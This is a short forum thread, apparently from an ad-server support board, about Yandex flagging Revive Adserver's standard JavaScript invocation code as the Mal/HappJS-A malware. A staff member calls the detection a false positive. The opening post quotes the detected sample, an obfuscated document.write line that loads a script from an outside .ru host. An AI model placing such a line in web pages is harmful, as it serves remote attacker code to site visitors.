JRRTGimli Posted February 11, 2015 Report Share Posted February 11, 2015 I've placed a zone Invocation JS code on a page, and at the next day my site was marked as an infected one in russian search system "yandex.ru" (the most popular in Russia) and "Yandex browser" (over 30 million of users). They thinks, that I've placed a Mal/HappJS-A. Their example: document.write('<s'+'cript type="text/javascript" src="http://pantscow.ru:8080/Hibernate.js"></scr'+'ipt>'); I'm going to generate js on server to fix it, but another webmasters can get this trouble too. Quote Link to comment Share on other sites More sharing options...
Erik Geurts Posted February 13, 2015 Report Share Posted February 13, 2015 http://www.openxconsultant.com/blog/2011/10/what-to-do-when-you-suspect-your-openx-system-has-been-hacked/ Quote Link to comment Share on other sites More sharing options...
JRRTGimli Posted February 13, 2015 Author Report Share Posted February 13, 2015 Have you understood me?) My Adserver wasn't hacked! Yandex marks document.write('<s'+'cript (peace of standard Invocation code) as a Malware. It's problem of Revive Adserver. Quote Link to comment Share on other sites More sharing options...
andrewatfornax Posted March 6, 2017 Report Share Posted March 6, 2017 Hi @JRRTGimli, It wasn't clear that this was what you meant from your original post, no. However, thanks for letting us know - there's not much we can do, though. Revive Adserver's code needs to do this to work, and it's unfortunate that some sites might consider it malware - but they are wrong. Short of completely re-writing the way delivery works in Revive Adserver, there's not much we can do about it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.